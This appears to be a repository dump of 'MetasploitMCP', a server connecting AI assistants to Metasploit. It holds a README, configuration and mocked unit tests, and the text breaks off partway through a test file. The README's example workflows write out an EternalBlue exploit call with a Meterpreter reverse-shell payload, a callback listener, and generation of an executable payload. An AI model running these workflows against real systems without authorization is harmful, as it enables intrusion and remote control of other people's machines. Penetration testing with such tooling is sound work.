# Directory Structure
```
├── .gitignore
├── conftest.py
├── LICENSE
├── Makefile
├── MetasploitMCP.py
├── pytest.ini
├── README.md
├── requirements-test.txt
├── requirements.txt
├── run_tests.py
└── tests
├── __init__.py
├── test_helpers.py
├── test_options_parsing.py
└── test_tools_integration.py
```
# Files
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
```
1 | # Byte-compiled / optimized / DLL files
2 | __pycache__/
3 | *.py[cod]
4 | *$py.class
5 |
6 | # Distribution / packaging
7 | dist/
8 | build/
9 | *.egg-info/
10 |
11 | # Virtual environments
12 | venv/
13 | env/
14 | ENV/
15 | .venv/
16 |
17 |
18 | # IDE specific files
19 | .idea/
20 | .vscode/
21 | *.swp
22 | *.swo
23 |
24 | # Logs
25 | *.log
26 |
27 | # Local configuration
28 | .env
29 | config.local.ini
30 |
31 | # Windows specific
32 | Thumbs.db
33 | desktop.ini
34 |
35 | # Python testing
36 | .pytest_cache/
37 | .coverage
38 | htmlcov/
```
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
```markdown
1 | # Metasploit MCP Server
2 |
3 | A Model Context Protocol (MCP) server for Metasploit Framework integration.
4 |
5 |
6 | https://github.com/user-attachments/assets/39b19fb5-8397-4ccd-b896-d1797ec185e1
7 |
8 |
9 | ## Description
10 |
11 | This MCP server provides a bridge between large language models like Claude and the Metasploit Framework penetration testing platform. It allows AI assistants to dynamically access and control Metasploit functionality through standardized tools, enabling a natural language interface to complex security testing workflows.
12 |
13 | ## Features
14 |
15 | ### Module Information
16 |
17 | - **list_exploits**: Search and list available Metasploit exploit modules
18 | - **list_payloads**: Search and list available Metasploit payload modules with optional platform and architecture filtering
19 |
20 | ### Exploitation Workflow
21 |
22 | - **run_exploit**: Configure and execute an exploit against a target with options to run checks first
23 | - **run_auxiliary_module**: Run any Metasploit auxiliary module with custom options
24 | - **run_post_module**: Execute post-exploitation modules against existing sessions
25 |
26 | ### Payload Generation
27 |
28 | - **generate_payload**: Generate payload files using Metasploit RPC (saves files locally)
29 |
30 | ### Session Management
31 |
32 | - **list_active_sessions**: Show current Metasploit sessions with detailed information
33 | - **send_session_command**: Run a command in an active shell or Meterpreter session
34 | - **terminate_session**: Forcefully end an active session
35 |
36 | ### Handler Management
37 |
38 | - **list_listeners**: Show all active handlers and background jobs
39 | - **start_listener**: Create a new multi/handler to receive connections
40 | - **stop_job**: Terminate any running job or handler
41 |
42 | ## Prerequisites
43 |
44 | - Metasploit Framework installed and msfrpcd running
45 | - Python 3.10 or higher
46 | - Required Python packages (see requirements.txt)
47 |
48 | ## Installation
49 |
50 | 1. Clone this repository
51 | 2. Install dependencies:
52 | ```
53 | pip install -r requirements.txt
54 | ```
55 | 3. Configure environment variables (optional):
56 | ```
57 | MSF_PASSWORD=yourpassword
58 | MSF_SERVER=127.0.0.1
59 | MSF_PORT=55553
60 | MSF_SSL=false
61 | PAYLOAD_SAVE_DIR=/path/to/save/payloads # Optional: Where to save generated payloads
62 | ```
63 |
64 | ## Usage
65 |
66 | Start the Metasploit RPC service:
67 |
68 | ```bash
69 | msfrpcd -P yourpassword -S -a 127.0.0.1 -p 55553
70 | ```
71 |
72 | ### Transport Options
73 |
74 | The server supports two transport methods:
75 |
76 | - **HTTP/SSE (Server-Sent Events)**: Default mode for interoperability with most MCP clients
77 | - **STDIO (Standard Input/Output)**: Used with Claude Desktop and similar direct pipe connections
78 |
79 | You can explicitly select the transport mode using the `--transport` flag:
80 |
81 | ```bash
82 | # Run with HTTP/SSE transport (default)
83 | python MetasploitMCP.py --transport http
84 |
85 | # Run with STDIO transport
86 | python MetasploitMCP.py --transport stdio
87 | ```
88 |
89 | Additional options for HTTP mode:
90 | ```bash
91 | python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085
92 | ```
93 |
94 | ### Claude Desktop Integration
95 |
96 | For Claude Desktop integration, configure `claude_desktop_config.json`:
97 |
98 | ```json
99 | {
100 | "mcpServers": {
101 | "metasploit": {
102 | "command": "uv",
103 | "args": [
104 | "--directory",
105 | "C:\\path\\to\\MetasploitMCP",
106 | "run",
107 | "MetasploitMCP.py",
108 | "--transport",
109 | "stdio"
110 | ],
111 | "env": {
112 | "MSF_PASSWORD": "yourpassword"
113 | }
114 | }
115 | }
116 | }
117 | ```
118 |
119 | ### Other MCP Clients
120 |
121 | For other MCP clients that use HTTP/SSE:
122 |
123 | 1. Start the server in HTTP mode:
124 | ```bash
125 | python MetasploitMCP.py --transport http --host 0.0.0.0 --port 8085
126 | ```
127 |
128 | 2. Configure your MCP client to connect to:
129 | - SSE endpoint: `http://your-server-ip:8085/sse`
130 |
131 | ## Security Considerations
132 |
133 | ⚠️ **IMPORTANT SECURITY WARNING**:
134 |
135 | This tool provides direct access to Metasploit Framework capabilities, which include powerful exploitation features. Use responsibly and only in environments where you have explicit permission to perform security testing.
136 |
137 | - Always validate and review all commands before execution
138 | - Only run in segregated test environments or with proper authorization
139 | - Be aware that post-exploitation commands can result in significant system modifications
140 |
141 | ## Example Workflows
142 |
143 | ### Basic Exploitation
144 |
145 | 1. List available exploits: `list_exploits("ms17_010")`
146 | 2. Select and run an exploit: `run_exploit("exploit/windows/smb/ms17_010_eternalblue", {"RHOSTS": "192.168.1.100"}, "windows/x64/meterpreter/reverse_tcp", {"LHOST": "192.168.1.10", "LPORT": 4444})`
147 | 3. List sessions: `list_active_sessions()`
148 | 4. Run commands: `send_session_command(1, "whoami")`
149 |
150 | ### Post-Exploitation
151 |
152 | 1. Run a post module: `run_post_module("windows/gather/enum_logged_on_users", 1)`
153 | 2. Send custom commands: `send_session_command(1, "sysinfo")`
154 | 3. Terminate when done: `terminate_session(1)`
155 |
156 | ### Handler Management
157 |
158 | 1. Start a listener: `start_listener("windows/meterpreter/reverse_tcp", "192.168.1.10", 4444)`
159 | 2. List active handlers: `list_listeners()`
160 | 3. Generate a payload: `generate_payload("windows/meterpreter/reverse_tcp", "exe", {"LHOST": "192.168.1.10", "LPORT": 4444})`
161 | 4. Stop a handler: `stop_job(1)`
162 |
163 | ## Testing
164 |
165 | This project includes comprehensive unit and integration tests to ensure reliability and maintainability.
166 |
167 | ### Prerequisites for Testing
168 |
169 | Install test dependencies:
170 |
171 | ```bash
172 | pip install -r requirements-test.txt
173 | ```
174 |
175 | Or use the convenient installer:
176 |
177 | ```bash
178 | python run_tests.py --install-deps
179 | # OR
180 | make install-deps
181 | ```
182 |
183 | ### Running Tests
184 |
185 | #### Quick Commands
186 |
187 | ```bash
188 | # Run all tests
189 | python run_tests.py --all
190 | # OR
191 | make test
192 |
193 | # Run with coverage report
194 | python run_tests.py --all --coverage
195 | # OR
196 | make coverage
197 |
198 | # Run with HTML coverage report
199 | python run_tests.py --all --coverage --html
200 | # OR
201 | make coverage-html
202 | ```
203 |
204 | #### Specific Test Suites
205 |
206 | ```bash
207 | # Unit tests only
208 | python run_tests.py --unit
209 | # OR
210 | make test-unit
211 |
212 | # Integration tests only
213 | python run_tests.py --integration
214 | # OR
215 | make test-integration
216 |
217 | # Options parsing tests
218 | python run_tests.py --options
219 | # OR
220 | make test-options
221 |
222 | # Helper function tests
223 | python run_tests.py --helpers
224 | # OR
225 | make test-helpers
226 |
227 | # MCP tools tests
228 | python run_tests.py --tools
229 | # OR
230 | make test-tools
231 | ```
232 |
233 | #### Test Options
234 |
235 | ```bash
236 | # Include slow tests
237 | python run_tests.py --all --slow
238 |
239 | # Include network tests (requires actual network)
240 | python run_tests.py --all --network
241 |
242 | # Verbose output
243 | python run_tests.py --all --verbose
244 |
245 | # Quick test (no coverage, fail fast)
246 | make quick-test
247 |
248 | # Debug mode (detailed failure info)
249 | make test-debug
250 | ```
251 |
252 | ### Test Structure
253 |
254 | - **`tests/test_options_parsing.py`**: Unit tests for the graceful options parsing functionality
255 | - **`tests/test_helpers.py`**: Unit tests for internal helper functions and MSF client management
256 | - **`tests/test_tools_integration.py`**: Integration tests for all MCP tools with mocked Metasploit backend
257 | - **`conftest.py`**: Shared test fixtures and configuration
258 | - **`pytest.ini`**: Pytest configuration with coverage settings
259 |
260 | ### Test Features
261 |
262 | - **Comprehensive Mocking**: All Metasploit dependencies are mocked, so tests run without requiring an actual MSF installation
263 | - **Async Support**: Full async/await testing support using pytest-asyncio
264 | - **Coverage Reporting**: Detailed coverage analysis with HTML reports
265 | - **Parametrized Tests**: Efficient testing of multiple input scenarios
266 | - **Fixture Management**: Reusable test fixtures for common setup scenarios
267 |
268 | ### Coverage Reports
269 |
270 | After running tests with coverage, reports are available in:
271 |
272 | - **Terminal**: Coverage summary displayed after test run
273 | - **HTML**: `htmlcov/index.html` (when using `--html` option)
274 |
275 | ### CI/CD Integration
276 |
277 | For continuous integration:
278 |
279 | ```bash
280 | # CI-friendly test command
281 | make ci-test
282 | # OR
283 | python run_tests.py --all --coverage --verbose
284 | ```
285 |
286 | ## Configuration Options
287 |
288 | ### Payload Save Directory
289 |
290 | By default, payloads generated with `generate_payload` are saved to a `payloads` directory in your home folder (`~/payloads` or `C:\Users\YourUsername\payloads`). You can customize this location by setting the `PAYLOAD_SAVE_DIR` environment variable.
291 |
292 | **Setting the environment variable:**
293 |
294 | - **Windows (PowerShell)**:
295 | ```powershell
296 | $env:PAYLOAD_SAVE_DIR = "C:\custom\path\to\payloads"
297 | ```
298 |
299 | - **Windows (Command Prompt)**:
300 | ```cmd
301 | set PAYLOAD_SAVE_DIR=C:\custom\path\to\payloads
302 | ```
303 |
304 | - **Linux/macOS**:
305 | ```bash
306 | export PAYLOAD_SAVE_DIR=/custom/path/to/payloads
307 | ```
308 |
309 | - **In Claude Desktop config**:
310 | ```json
311 | "env": {
312 | "MSF_PASSWORD": "yourpassword",
313 | "PAYLOAD_SAVE_DIR": "C:\\your\\actual\\path\\to\\payloads" // Only add if you want to override the default
314 | }
315 | ```
316 |
317 | **Note:** If you specify a custom path, make sure it exists or the application has permission to create it. If the path is invalid, payload generation might fail.
318 |
319 | ## License
320 |
321 | Apache 2.0
322 |
```
--------------------------------------------------------------------------------
/tests/__init__.py:
--------------------------------------------------------------------------------
```python
1 | # Test package for MetasploitMCP
2 |
```
--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
```
1 | fastapi>=0.95.0
2 | uvicorn[standard]>=0.22.0
3 | pymetasploit3>=1.0.6
4 | mcp>=1.6.0
5 | fastmcp>=2.10.3
6 |
```
--------------------------------------------------------------------------------
/requirements-test.txt:
--------------------------------------------------------------------------------
```
1 | # Testing dependencies for MetasploitMCP
2 | pytest>=7.0.0
3 | pytest-asyncio>=0.21.0
4 | pytest-mock>=3.10.0
5 | pytest-cov>=4.0.0
6 | mock>=4.0.3
7 |
```
--------------------------------------------------------------------------------
/pytest.ini:
--------------------------------------------------------------------------------
```
1 | [tool:pytest]
2 | # Pytest configuration for MetasploitMCP
3 |
4 | # Test discovery
5 | testpaths = tests
6 | python_files = test_*.py
7 | python_classes = Test*
8 | python_functions = test_*
9 |
10 | # Output and reporting
11 | addopts =
12 | -v
13 | --tb=short
14 | --strict-markers
15 | --disable-warnings
16 | --cov=MetasploitMCP
17 | --cov-report=term-missing
18 | --cov-report=html:htmlcov
19 | --cov-fail-under=80
20 |
21 | # Async test support
22 | asyncio_mode = auto
23 |
24 | # Markers
25 | markers =
26 | unit: Unit tests for individual functions
27 | integration: Integration tests for full workflows
28 | slow: Tests that take longer to run
29 | network: Tests that require network access (disabled by default)
30 |
31 | # Minimum version
32 | minversion = 7.0
33 |
34 | # Filter warnings
35 | filterwarnings =
36 | ignore::DeprecationWarning
37 | ignore::PendingDeprecationWarning
38 | ignore:.*unclosed.*:ResourceWarning
39 |
```
--------------------------------------------------------------------------------
/run_tests.py:
--------------------------------------------------------------------------------
```python
1 | #!/usr/bin/env python3
2 | """
3 | Test runner script for MetasploitMCP.
4 | Provides convenient commands for running different test suites.
5 | """
6 |
7 | import sys
8 | import os
9 | import argparse
10 | import subprocess
11 | from pathlib import Path
12 |
13 | def run_command(cmd, description=""):
14 | """Run a command and handle errors."""
15 | if description:
16 | print(f"\n🔄 {description}")
17 | print(f"Running: {' '.join(cmd)}")
18 |
19 | try:
20 | result = subprocess.run(cmd, check=True, capture_output=True, text=True)
21 | print("✅ Success!")
22 | if result.stdout:
23 | print(result.stdout)
24 | return True
25 | except subprocess.CalledProcessError as e:
26 | print(f"❌ Failed with exit code {e.returncode}")
27 | if e.stdout:
28 | print("STDOUT:", e.stdout)
29 | if e.stderr:
30 | print("STDERR:", e.stderr)
31 | return False
32 |
33 | def check_dependencies():
34 | """Check if test dependencies are installed."""
35 | try:
36 | import pytest
37 | import pytest_asyncio
38 | import pytest_mock
39 | import pytest_cov
40 | return True
41 | except ImportError as e:
42 | print(f"❌ Missing test dependency: {e}")
43 | print("💡 Install test dependencies with: pip install -r requirements-test.txt")
44 | return False
45 |
46 | def main():
47 | parser = argparse.ArgumentParser(description="MetasploitMCP Test Runner")
48 | parser.add_argument("--all", action="store_true", help="Run all tests")
49 | parser.add_argument("--unit", action="store_true", help="Run unit tests only")
50 | parser.add_argument("--integration", action="store_true", help="Run integration tests only")
51 | parser.add_argument("--options", action="store_true", help="Run options parsing tests only")
52 | parser.add_argument("--helpers", action="store_true", help="Run helper function tests only")
53 | parser.add_argument("--tools", action="store_true", help="Run MCP tools tests only")
54 | parser.add_argument("--coverage", action="store_true", help="Generate coverage report")
55 | parser.add_argument("--html", action="store_true", help="Generate HTML coverage report")
56 | parser.add_argument("--slow", action="store_true", help="Include slow tests")
57 | parser.add_argument("--network", action="store_true", help="Include network tests")
58 | parser.add_argument("--verbose", "-v", action="store_true", help="Verbose output")
59 | parser.add_argument("--install-deps", action="store_true", help="Install test dependencies")
60 |
61 | args = parser.parse_args()
62 |
63 | # Handle dependency installation
64 | if args.install_deps:
65 | return run_command([
66 | sys.executable, "-m", "pip", "install", "-r", "requirements-test.txt"
67 | ], "Installing test dependencies")
68 |
69 | # Check dependencies
70 | if not check_dependencies():
71 | return False
72 |
73 | # Build pytest command
74 | cmd = [sys.executable, "-m", "pytest"]
75 |
76 | # Add verbosity
77 | if args.verbose:
78 | cmd.append("-v")
79 |
80 | # Add coverage options
81 | if args.coverage or args.html:
82 | cmd.extend(["--cov=MetasploitMCP", "--cov-report=term-missing"])
83 | if args.html:
84 | cmd.append("--cov-report=html:htmlcov")
85 |
86 | # Add slow/network test options
87 | if args.slow:
88 | cmd.append("--run-slow")
89 | if args.network:
90 | cmd.append("--run-network")
91 |
92 | # Determine which tests to run
93 | if args.options:
94 | cmd.append("tests/test_options_parsing.py")
95 | description = "Running options parsing tests"
96 | elif args.helpers:
97 | cmd.append("tests/test_helpers.py")
98 | description = "Running helper function tests"
99 | elif args.tools:
100 | cmd.append("tests/test_tools_integration.py")
101 | description = "Running MCP tools integration tests"
102 | elif args.unit:
103 | cmd.extend(["-m", "unit"])
104 | description = "Running unit tests"
105 | elif args.integration:
106 | cmd.extend(["-m", "integration"])
107 | description = "Running integration tests"
108 | elif args.all:
109 | cmd.append("tests/")
110 | description = "Running all tests"
111 | else:
112 | # Default: run all tests
113 | cmd.append("tests/")
114 | description = "Running all tests (default)"
115 |
116 | # Run the tests
117 | success = run_command(cmd, description)
118 |
119 | if success and (args.coverage or args.html):
120 | print("\n📊 Coverage report generated")
121 | if args.html:
122 | html_path = Path("htmlcov/index.html").resolve()
123 | print(f"📄 HTML report: file://{html_path}")
124 |
125 | return success
126 |
127 | if __name__ == "__main__":
128 | success = main()
129 | sys.exit(0 if success else 1)
130 |
```
--------------------------------------------------------------------------------
/conftest.py:
--------------------------------------------------------------------------------
```python
1 | #!/usr/bin/env python3
2 | """
3 | Pytest configuration and shared fixtures for MetasploitMCP tests.
4 | """
5 |
6 | import pytest
7 | import sys
8 | import os
9 | from unittest.mock import Mock, patch
10 |
11 | # Add the project root to Python path
12 | sys.path.insert(0, os.path.dirname(__file__))
13 |
14 | def pytest_configure(config):
15 | """Configure pytest with custom settings."""
16 | # Mock external dependencies that might not be available
17 | mock_modules = [
18 | 'uvicorn',
19 | 'fastapi',
20 | 'mcp.server.fastmcp',
21 | 'mcp.server.sse',
22 | 'pymetasploit3.msfrpc',
23 | 'starlette.applications',
24 | 'starlette.routing',
25 | 'mcp.server.session'
26 | ]
27 |
28 | for module in mock_modules:
29 | if module not in sys.modules:
30 | sys.modules[module] = Mock()
31 |
32 | def pytest_collection_modifyitems(config, items):
33 | """Modify test collection to add markers automatically."""
34 | for item in items:
35 | # Add unit marker to test_options_parsing and test_helpers
36 | if "test_options_parsing" in item.nodeid or "test_helpers" in item.nodeid:
37 | item.add_marker(pytest.mark.unit)
38 |
39 | # Add integration marker to integration tests
40 | if "test_tools_integration" in item.nodeid:
41 | item.add_marker(pytest.mark.integration)
42 |
43 | # Mark network tests
44 | if "network" in item.name.lower():
45 | item.add_marker(pytest.mark.network)
46 |
47 | # Mark slow tests
48 | if any(keyword in item.name.lower() for keyword in ["slow", "timeout", "long"]):
49 | item.add_marker(pytest.mark.slow)
50 |
51 | @pytest.fixture(scope="session")
52 | def mock_msf_environment():
53 | """Session-scoped fixture that provides a complete mock MSF environment."""
54 |
55 | class MockMsfRpcClient:
56 | def __init__(self):
57 | self.modules = Mock()
58 | self.core = Mock()
59 | self.sessions = Mock()
60 | self.jobs = Mock()
61 | self.consoles = Mock()
62 |
63 | # Default return values
64 | self.core.version = {'version': '6.3.0'}
65 | self.modules.exploits = []
66 | self.modules.payloads = []
67 | self.sessions.list.return_value = {}
68 | self.jobs.list.return_value = {}
69 |
70 | class MockMsfConsole:
71 | def __init__(self, cid='test-console'):
72 | self.cid = cid
73 |
74 | def read(self):
75 | return {'data': '', 'prompt': 'msf6 > ', 'busy': False}
76 |
77 | def write(self, command):
78 | return True
79 |
80 | class MockMsfRpcError(Exception):
81 | pass
82 |
83 | # Apply mocks
84 | with patch.dict('sys.modules', {
85 | 'pymetasploit3.msfrpc': Mock(
86 | MsfRpcClient=MockMsfRpcClient,
87 | MsfConsole=MockMsfConsole,
88 | MsfRpcError=MockMsfRpcError
89 | )
90 | }):
91 | yield {
92 | 'client_class': MockMsfRpcClient,
93 | 'console_class': MockMsfConsole,
94 | 'error_class': MockMsfRpcError
95 | }
96 |
97 | @pytest.fixture
98 | def mock_logger():
99 | """Fixture providing a mock logger."""
100 | with patch('MetasploitMCP.logger') as mock_log:
101 | yield mock_log
102 |
103 | @pytest.fixture
104 | def temp_payload_dir(tmp_path):
105 | """Fixture providing a temporary directory for payload saves."""
106 | payload_dir = tmp_path / "payloads"
107 | payload_dir.mkdir()
108 |
109 | with patch('MetasploitMCP.PAYLOAD_SAVE_DIR', str(payload_dir)):
110 | yield str(payload_dir)
111 |
112 | @pytest.fixture
113 | def mock_asyncio_to_thread():
114 | """Fixture to mock asyncio.to_thread for testing."""
115 | async def mock_to_thread(func, *args, **kwargs):
116 | return func(*args, **kwargs)
117 |
118 | with patch('asyncio.to_thread', side_effect=mock_to_thread):
119 | yield
120 |
121 | @pytest.fixture
122 | def capture_logs(caplog):
123 | """Fixture to capture and provide log output."""
124 | import logging
125 | caplog.set_level(logging.DEBUG)
126 | return caplog
127 |
128 | # Command line options
129 | def pytest_addoption(parser):
130 | """Add custom command line options."""
131 | parser.addoption(
132 | "--run-slow",
133 | action="store_true",
134 | default=False,
135 | help="Run slow tests"
136 | )
137 | parser.addoption(
138 | "--run-network",
139 | action="store_true",
140 | default=False,
141 | help="Run tests that require network access"
142 | )
143 |
144 | def pytest_runtest_setup(item):
145 | """Setup hook to skip tests based on markers and options."""
146 | if "slow" in item.keywords and not item.config.getoption("--run-slow"):
147 | pytest.skip("Skipping slow test (use --run-slow to run)")
148 |
149 | if "network" in item.keywords and not item.config.getoption("--run-network"):
150 | pytest.skip("Skipping network test (use --run-network to run)")
151 |
152 | # Test environment setup
153 | @pytest.fixture(autouse=True)
154 | def reset_msf_client():
155 | """Automatically reset the global MSF client between tests."""
156 | with patch('MetasploitMCP._msf_client_instance', None):
157 | yield
158 |
```
--------------------------------------------------------------------------------
/tests/test_options_parsing.py:
--------------------------------------------------------------------------------
```python
1 | #!/usr/bin/env python3
2 | """
3 | Unit tests for the options parsing functionality in MetasploitMCP.
4 | """
5 |
6 | import pytest
7 | import sys
8 | import os
9 | from unittest.mock import Mock, patch
10 | from typing import Dict, Any, Union
11 |
12 | # Add the parent directory to the path to import MetasploitMCP
13 | sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
14 |
15 | # Mock the dependencies that aren't available in test environment
16 | sys.modules['uvicorn'] = Mock()
17 | sys.modules['fastapi'] = Mock()
18 | sys.modules['mcp.server.fastmcp'] = Mock()
19 | sys.modules['mcp.server.sse'] = Mock()
20 | sys.modules['pymetasploit3.msfrpc'] = Mock()
21 | sys.modules['starlette.applications'] = Mock()
22 | sys.modules['starlette.routing'] = Mock()
23 | sys.modules['mcp.server.session'] = Mock()
24 |
25 | # Import the function we want to test
26 | from MetasploitMCP import _parse_options_gracefully
27 |
28 |
29 | class TestParseOptionsGracefully:
30 | """Test cases for the _parse_options_gracefully function."""
31 |
32 | def test_dict_format_passthrough(self):
33 | """Test that dictionary format is passed through unchanged."""
34 | input_dict = {"LHOST": "192.168.1.100", "LPORT": 4444}
35 | result = _parse_options_gracefully(input_dict)
36 | assert result == input_dict
37 | assert result is input_dict # Should be the same object
38 |
39 | def test_none_returns_empty_dict(self):
40 | """Test that None input returns empty dictionary."""
41 | result = _parse_options_gracefully(None)
42 | assert result == {}
43 | assert isinstance(result, dict)
44 |
45 | def test_empty_string_returns_empty_dict(self):
46 | """Test that empty string returns empty dictionary."""
47 | result = _parse_options_gracefully("")
48 | assert result == {}
49 |
50 | result = _parse_options_gracefully(" ")
51 | assert result == {}
52 |
53 | def test_empty_dict_returns_empty_dict(self):
54 | """Test that empty dictionary returns empty dictionary."""
55 | result = _parse_options_gracefully({})
56 | assert result == {}
57 |
58 | def test_simple_string_format(self):
59 | """Test basic string format parsing."""
60 | input_str = "LHOST=192.168.1.100,LPORT=4444"
61 | expected = {"LHOST": "192.168.1.100", "LPORT": 4444}
62 | result = _parse_options_gracefully(input_str)
63 | assert result == expected
64 |
65 | def test_string_format_with_spaces(self):
66 | """Test string format with extra spaces."""
67 | input_str = " LHOST = 192.168.1.100 , LPORT = 4444 "
68 | expected = {"LHOST": "192.168.1.100", "LPORT": 4444}
69 | result = _parse_options_gracefully(input_str)
70 | assert result == expected
71 |
72 | def test_string_format_with_quotes(self):
73 | """Test string format with quoted values."""
74 | input_str = 'LHOST="192.168.1.100",LPORT="4444"'
75 | expected = {"LHOST": "192.168.1.100", "LPORT": 4444}
76 | result = _parse_options_gracefully(input_str)
77 | assert result == expected
78 |
79 | input_str = "LHOST='192.168.1.100',LPORT='4444'"
80 | result = _parse_options_gracefully(input_str)
81 | assert result == expected
82 |
83 | def test_boolean_conversion(self):
84 | """Test boolean value conversion."""
85 | input_str = "ExitOnSession=true,Verbose=false,Debug=TRUE,Silent=FALSE"
86 | expected = {
87 | "ExitOnSession": True,
88 | "Verbose": False,
89 | "Debug": True,
90 | "Silent": False
91 | }
92 | result = _parse_options_gracefully(input_str)
93 | assert result == expected
94 |
95 | def test_numeric_conversion(self):
96 | """Test numeric value conversion."""
97 | input_str = "LPORT=4444,Timeout=30,Retries=5"
98 | expected = {"LPORT": 4444, "Timeout": 30, "Retries": 5}
99 | result = _parse_options_gracefully(input_str)
100 | assert result == expected
101 |
102 | def test_mixed_types(self):
103 | """Test parsing with mixed value types."""
104 | input_str = "LHOST=192.168.1.100,LPORT=4444,SSL=true,Retries=3"
105 | expected = {
106 | "LHOST": "192.168.1.100",
107 | "LPORT": 4444,
108 | "SSL": True,
109 | "Retries": 3
110 | }
111 | result = _parse_options_gracefully(input_str)
112 | assert result == expected
113 |
114 | def test_equals_in_value(self):
115 | """Test parsing when value contains equals sign."""
116 | input_str = "LURI=/test=value,LHOST=192.168.1.1"
117 | expected = {"LURI": "/test=value", "LHOST": "192.168.1.1"}
118 | result = _parse_options_gracefully(input_str)
119 | assert result == expected
120 |
121 | def test_complex_values(self):
122 | """Test parsing complex values like file paths and URLs."""
123 | input_str = "CertFile=/path/to/cert.pem,URL=https://example.com:8443/api,Command=ls -la"
124 | expected = {
125 | "CertFile": "/path/to/cert.pem",
126 | "URL": "https://example.com:8443/api",
127 | "Command": "ls -la"
128 | }
129 | result = _parse_options_gracefully(input_str)
130 | assert result == expected
131 |
132 | def test_single_option(self):
133 | """Test parsing single option."""
134 | input_str = "LHOST=192.168.1.100"
135 | expected = {"LHOST": "192.168.1.100"}
136 | result = _parse_options_gracefully(input_str)
137 | assert result == expected
138 |
139 | def test_error_missing_equals(self):
140 | """Test error handling for missing equals sign."""
141 | with pytest.raises(ValueError, match="missing '='"):
142 | _parse_options_gracefully("LHOST192.168.1.100")
143 |
144 | with pytest.raises(ValueError, match="missing '='"):
145 | _parse_options_gracefully("LHOST=192.168.1.100,LPORT4444")
146 |
147 | def test_error_empty_key(self):
148 | """Test error handling for empty key."""
149 | with pytest.raises(ValueError, match="empty key"):
150 | _parse_options_gracefully("=value")
151 |
152 | with pytest.raises(ValueError, match="empty key"):
153 | _parse_options_gracefully("LHOST=192.168.1.100,=4444")
154 |
155 | def test_error_invalid_type(self):
156 | """Test error handling for invalid input types."""
157 | with pytest.raises(ValueError, match="Options must be a dictionary"):
158 | _parse_options_gracefully(123)
159 |
160 | with pytest.raises(ValueError, match="Options must be a dictionary"):
161 | _parse_options_gracefully([1, 2, 3])
162 |
163 | def test_whitespace_handling(self):
164 | """Test various whitespace scenarios."""
165 | # Leading/trailing spaces in whole string
166 | result = _parse_options_gracefully(" LHOST=192.168.1.100,LPORT=4444 ")
167 | expected = {"LHOST": "192.168.1.100", "LPORT": 4444}
168 | assert result == expected
169 |
170 | # Spaces around commas
171 | result = _parse_options_gracefully("LHOST=192.168.1.100 , LPORT=4444")
172 | assert result == expected
173 |
174 | # Multiple spaces
175 | result = _parse_options_gracefully("LHOST=192.168.1.100, LPORT=4444")
176 | assert result == expected
177 |
178 | def test_edge_case_empty_value(self):
179 | """Test handling of empty values."""
180 | input_str = "LHOST=192.168.1.100,EmptyValue="
181 | expected = {"LHOST": "192.168.1.100", "EmptyValue": ""}
182 | result = _parse_options_gracefully(input_str)
183 | assert result == expected
184 |
185 | def test_quoted_empty_value(self):
186 | """Test handling of quoted empty values."""
187 | input_str = 'LHOST=192.168.1.100,EmptyValue=""'
188 | expected = {"LHOST": "192.168.1.100", "EmptyValue": ""}
189 | result = _parse_options_gracefully(input_str)
190 | assert result == expected
191 |
192 | def test_special_characters_in_values(self):
193 | """Test handling of special characters in values."""
194 | input_str = "Password=p@ssw0rd!,Path=/home/user/file.txt,Regex=\\d+"
195 | expected = {
196 | "Password": "p@ssw0rd!",
197 | "Path": "/home/user/file.txt",
198 | "Regex": "\\d+"
199 | }
200 | result = _parse_options_gracefully(input_str)
201 | assert result == expected
202 |
203 | @pytest.mark.parametrize("input_val,expected", [
204 | # Basic cases
205 | ({"key": "value"}, {"key": "value"}),
206 | ("key=value", {"key": "value"}),
207 | (None, {}),
208 | ("", {}),
209 |
210 | # Type conversions
211 | ("port=8080", {"port": 8080}),
212 | ("enabled=true", {"enabled": True}),
213 | ("disabled=false", {"disabled": False}),
214 |
215 | # Complex cases
216 | ("a=1,b=true,c=text", {"a": 1, "b": True, "c": "text"}),
217 | ])
218 | def test_parametrized_cases(self, input_val, expected):
219 | """Parametrized test cases for various inputs."""
220 | result = _parse_options_gracefully(input_val)
221 | assert result == expected
222 |
223 | def test_large_number_handling(self):
224 | """Test handling of large numbers that might not fit in int."""
225 | # Python can handle very large integers, so use a string that definitely isn't a number
226 | mixed_num = "999999999999999999999abc"
227 | input_str = f"BigNumber={mixed_num}"
228 | result = _parse_options_gracefully(input_str)
229 | # The function tries int conversion but falls back to string on error
230 | assert result["BigNumber"] == mixed_num
231 | assert isinstance(result["BigNumber"], str)
232 |
233 | def test_logging_behavior(self):
234 | """Test that logging occurs during string conversion."""
235 | with patch('MetasploitMCP.logger') as mock_logger:
236 | _parse_options_gracefully("LHOST=192.168.1.100,LPORT=4444")
237 | # Should log the conversion
238 | assert mock_logger.info.call_count >= 1
239 |
240 | # Should contain conversion messages
241 | call_args = [call[0][0] for call in mock_logger.info.call_args_list]
242 | assert any("Converting string format" in msg for msg in call_args)
243 | assert any("Successfully converted" in msg for msg in call_args)
244 |
245 |
246 | if __name__ == "__main__":
247 | pytest.main([__file__, "-v"])
248 |
```
--------------------------------------------------------------------------------
/tests/test_helpers.py:
--------------------------------------------------------------------------------
```python
1 | #!/usr/bin/env python3
2 | """
3 | Unit tests for helper functions in MetasploitMCP.
4 | """
5 |
6 | import pytest
7 | import sys
8 | import os
9 | import asyncio
10 | from unittest.mock import Mock, patch, AsyncMock, MagicMock
11 | from typing import Dict, Any
12 |
13 | # Add the parent directory to the path to import MetasploitMCP
14 | sys.path.insert(0, os.path.join(os.path.dirname(__file__), '..'))
15 |
16 | # Mock the dependencies that aren't available in test environment
17 | sys.modules['uvicorn'] = Mock()
18 | sys.modules['fastapi'] = Mock()
19 | sys.modules['mcp.server.fastmcp'] = Mock()
20 | sys.modules['mcp.server.sse'] = Mock()
21 | sys.modules['pymetasploit3.msfrpc'] = Mock()
22 | sys.modules['starlette.applications'] = Mock()
23 | sys.modules['starlette.routing'] = Mock()
24 | sys.modules['mcp.server.session'] = Mock()
25 |
26 | # Create mock classes for MSF objects
27 | class MockMsfRpcClient:
28 | def __init__(self):
29 | self.modules = Mock()
30 | self.core = Mock()
31 | self.sessions = Mock()
32 | self.jobs = Mock()
33 | self.consoles = Mock()
34 |
35 | class MockMsfConsole:
36 | def __init__(self, cid='test-console-id'):
